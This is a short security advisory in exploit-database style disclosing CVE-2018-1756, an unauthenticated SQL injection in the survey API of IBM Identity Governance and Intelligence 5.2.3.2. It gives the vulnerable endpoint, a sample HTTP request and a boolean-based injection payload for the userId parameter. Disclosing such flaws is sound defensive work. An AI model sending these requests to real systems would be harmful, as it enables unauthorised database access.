IBM Identity Governance And Intelligence 5.2.3.2 / 5.2.4 SQL Injection

`# Exploit Title: [Unauthenticated Remote SQLi]  
# Date: [11/09/2018]  
# Exploit Author: [Mohamed Sayed - From SecureMisr Company]  
# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10728883]  
# Version: [IGI 5.2.3.2] (REQUIRED)  
# Tested on: [Windows 10]  
# CVE : [CVE-2018-1756]  
  
Hello ,  
IBM IGI version 5.2.3.2 is suffering from unauthenticated remote SQLi  
The vulnerability enable *remote unauthenticated* attacker to take over the  
server database and affect the confidentiality , integrity and availability  
of the system ,  
  
The vulnerability is in the survey end point API  
/survey/api/config?userId=XXX  
  
The userId parameter value is injected directly to a sql query without  
sensitization nor validation and by exploiting it the attacker will be able  
to gain access on the server database  
  
SAMPLE of Vulnerable HTTP Request  
  
GET /survey/api/config?userId=VUL HTTP/1.1  
Host: HOST_IP  
Connection: close  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36  
Accept: */*  
Referer: https://HOST_IP  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
  
Payload sample :  
userId=1 'AND 1=1 AND '2'='2  
  
  
Mohamed Sayed  
Sr.Information Security analyst  
  
*Please make sure to encrypt any sensitive information or attachments , you  
can download my Public PGP key from* here  
<https://keys.mailvelope.com/pks/lookup?op=get&search=0x238EFF7331E6E927>  
  
`